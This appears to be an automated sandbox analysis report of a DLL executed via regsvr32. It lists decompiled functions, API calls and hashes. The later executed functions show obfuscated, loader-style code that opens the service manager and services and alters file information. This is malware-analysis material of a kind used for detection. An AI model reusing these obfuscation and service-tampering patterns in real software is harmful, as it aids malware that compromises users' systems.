0x10019c0d
0x10019bf1
0x10019c22

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10019BB5
PathFindExtensionA.SHLWAPI(?), ref: 10019BCB

Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C

Part of subcall function 100198A8: __EH_prolog3.LIBCMT ref: 100198C7
Part of subcall function 100198A8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
Part of subcall function 100198A8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 10019937
Part of subcall function 100198A8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
Part of subcall function 100198A8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE

Strings

%s.dll, xrefs: 10019BD1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
Instruction ID: 0b7e9202130163ae395afdc0551c1bbeafcf20f4336e4298d0e5f786ec062517
Opcode Fuzzy Hash: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
Instruction Fuzzy Hash: FB019675A00118ABDB18DBB4DD569EEB3F9EB44B00F0101B9A902D7141EA74EA84CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1003F023 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E1003F023(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x100b9b10; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E1000F67A( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E10049170(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x100b9b10 = _t25;
				return _t25;
			}

0x1003f026
0x1003f02e
0x1003f031
0x1003f094
0x1003f094
0x1003f033
0x1003f034
0x1003f050
0x1003f054
0x1003f059
0x1003f063
0x1003f06e
0x1003f06f
0x1003f07a
0x1003f087
0x1003f087
0x1003f07a
0x1003f089
0x00000000

APIs

Part of subcall function 1000F67A: GetModuleHandleA.KERNEL32(?,?,10013E00,InitCommonControlsEx,00000000,10014775,00040000,00008000,?,?,1001754E,?,00040000), ref: 1000F686
Part of subcall function 1000F67A: LoadLibraryA.KERNEL32(?), ref: 1000F696

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 1003F04A
_memset.LIBCMT ref: 1003F063

Strings

DllGetVersion, xrefs: 1003F044

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc_memset
String ID: DllGetVersion
API String ID: 3385804498-2861820592
Opcode ID: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
Instruction ID: 83cedfc33295a2b91a424a6dec3734a2390b18edd068e67cc7ee030c49faf0e2
Opcode Fuzzy Hash: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
Instruction Fuzzy Hash: 64F08175A003295AE701EBFC9C85AAE73E8EB04755F100275FA60F71A2D770DD0487A5

Uniqueness

Uniqueness Score: -1.00%

Function 10021BD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10021BD1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = L1001286D( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E1004763E(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x10021bd1
0x10021bd1
0x10021bd1
0x10021bd7
0x10021bde
0x10021be2
0x10021be7
0x10021bfc
0x00000000
0x10021bfe
0x10021c05
0x10021c14
0x10021c1c
0x10021c1f
0x10021c1f
0x10021be9
0x10021be9
0x10021be9
0x10021be9
0x10021c2c

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05

Strings

combobox, xrefs: 10021C0E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassLongNameWindow
String ID: combobox
API String ID: 1147815241-2240613097
Opcode ID: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
Instruction ID: b712a396dd2164fb9b1ba4218fa7ea712223ec1a3925b5c20f6cf45ffa4882a6
Opcode Fuzzy Hash: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
Instruction Fuzzy Hash: F5F0B435915529AFDB01EFB4CC81DEE73BCEB06350B91061AE812E7180DB34F90487D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001A66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1001A66C(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E1001E302(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E1001DD4F(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E1001A4D8, 0, GetCurrentThreadId());
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}

0x1001a66c
0x1001a671
0x1001a675
0x1001a677
0x1001a678
0x1001a68f
0x1001a695
0x00000000
0x1001a698
0x1001a699

APIs

GetCurrentThreadId.KERNEL32 ref: 1001A67F
SetWindowsHookExA.USER32(000000FF,V$>,00000000,00000000), ref: 1001A68F

Strings

V$>, xrefs: 1001A688

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID: V$>
API String ID: 1904029216-2039469509
Opcode ID: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
Instruction ID: ed438374310f535bd5856febee57efaef843a1edf130da502d0a4a26ef8a0b4a
Opcode Fuzzy Hash: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
Instruction Fuzzy Hash: 6BD0A7768042606FF711F7706D0DB993AC4DB02320F1D0385F5229E0E2C634D8C04755

Uniqueness

Uniqueness Score: -1.00%

Function 10021F6C Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E10021F6C(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A069(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x100bdcd0 == 0) {
					_t4 = E10021F03();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x100bde88 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x100bde70);
					if( *_t15 == 0) {
						_t4 = 0x100bdcd8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x100bde70);
				}
				EnterCriticalSection(0x100bdcd8 + _t11 * 0x18);
				return _t4;
			}

0x10021f6c
0x10021f6c
0x10021f6c
0x10021f6d
0x10021f71
0x10021f74
0x10021f76
0x10021f76
0x10021f82
0x10021f84
0x10021f84
0x10021f89
0x10021f90
0x10021f91
0x10021f92
0x10021fa1
0x10021fa8
0x10021fad
0x10021fb4
0x10021fb7
0x10021fbd
0x10021fbd
0x10021fc4
0x10021fc4
0x10021fd0
0x10021fd6

APIs

EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 64f4ec0a678fd876fe4ee42fffd3b8208d407861c015f56a8549a8abe23736b7
Instruction ID: e149e14db0e00e2cb13c8202d8dfa839a74b6037fcc35bbcfa2c368ff7671eea
Opcode Fuzzy Hash: 64f4ec0a678fd876fe4ee42fffd3b8208d407861c015f56a8549a8abe23736b7
Instruction Fuzzy Hash: 11F0F67B1042158BE280EB58ED84689F6ABFBA2285F92023BF15046011E7719480C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 1002047D Relevance: 5.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002047D(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x100bdc5c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x1002047f
0x10020482
0x10020482
0x10020486
0x1002048c
0x10020492
0x100204bb
0x100204bc
0x00000000
0x100204c2
0x10020494
0x10020497
0x00000000
0x00000000
0x1002049b
0x100204a3
0x00000000
0x100204aa
0x100204b1
0x00000000
0x100204b7

APIs

EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 10020486
TlsGetValue.KERNEL32 ref: 1002049B
LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204B1
LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204BC

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 918742f588fd345076f23ae14a5de573fbe5f3d54cd501eb2ce4c57920c32872
Instruction ID: b5a73c87c3e66ad61877701d9cf1b3bb21c3fb29a7b113b59b8626512fd4f99e
Opcode Fuzzy Hash: 918742f588fd345076f23ae14a5de573fbe5f3d54cd501eb2ce4c57920c32872
Instruction Fuzzy Hash: 0EF05EB62007509FD210DF24DD8888A73FAFB84255366C99AFA4293112C6B4F8458AE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1992, Parent PID: 668COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.1%
Total number of Nodes:	1055
Total number of Limit Nodes:	17

Executed Functions

Function 002BF1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E002BF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E002B9E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E002CBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x002bf1e5
0x002bf1ea
0x002bf1f5
0x002bf1fa
0x002bf203
0x002bf20a
0x002bf20d
0x002bf210
0x002bf217
0x002bf21b
0x002bf21f
0x002bf226
0x002bf22d
0x002bf23a
0x002bf23e
0x002bf241
0x002bf245
0x002bf24c
0x002bf253
0x002bf25a
0x002bf25e
0x002bf265
0x002bf276
0x002bf279
0x002bf27d
0x002bf284
0x002bf2a3
0x002bf2b0
0x002bf2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 002BF2B0

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 52b46930a6ef4ee5d262ce57431139ae5b2504dcc952bda82d0bd9513e9713e5
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: ED2155B5D0121DAFDB08DFA5C88A8EEFBB8FB44708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002B32B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E002B32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E002B9E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E002CBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x002b32be
0x002b32bf
0x002b32c2
0x002b32c3
0x002b32c8
0x002b32cd
0x002b32d6
0x002b32d9
0x002b32dc
0x002b32e9
0x002b32ec
0x002b32f4
0x002b32f5
0x002b32fa
0x002b3304
0x002b330b
0x002b330f
0x002b3316
0x002b331d
0x002b3324
0x002b3335
0x002b3338
0x002b333c
0x002b3343
0x002b334a
0x002b3361
0x002b3364
0x002b3377
0x002b3384
0x002b338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 002B3384

Strings

w\ y, xrefs: 002B331D

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 7aee15a07568b3648bd2ca9a2430bacf9f0b74025d94402f69a1942335105dbc
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 712123B5D01228FBCB04DFA9D84A9EEBFB5FB40344F208189E524A6250D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002BC4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E002BC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B9E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E002CBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x002bc4f2
0x002bc4f5
0x002bc4f7
0x002bc4fa
0x002bc4fd
0x002bc500
0x002bc501
0x002bc502
0x002bc507
0x002bc50e
0x002bc515
0x002bc51c
0x002bc523
0x002bc52a
0x002bc52d
0x002bc531
0x002bc538
0x002bc53f
0x002bc556
0x002bc55e
0x002bc562
0x002bc569
0x002bc570
0x002bc577
0x002bc57e
0x002bc585
0x002bc58c
0x002bc593
0x002bc59a
0x002bc5ad
0x002bc5bc
0x002bc5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 002BC5BC

Strings

", xrefs: 002BC577

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

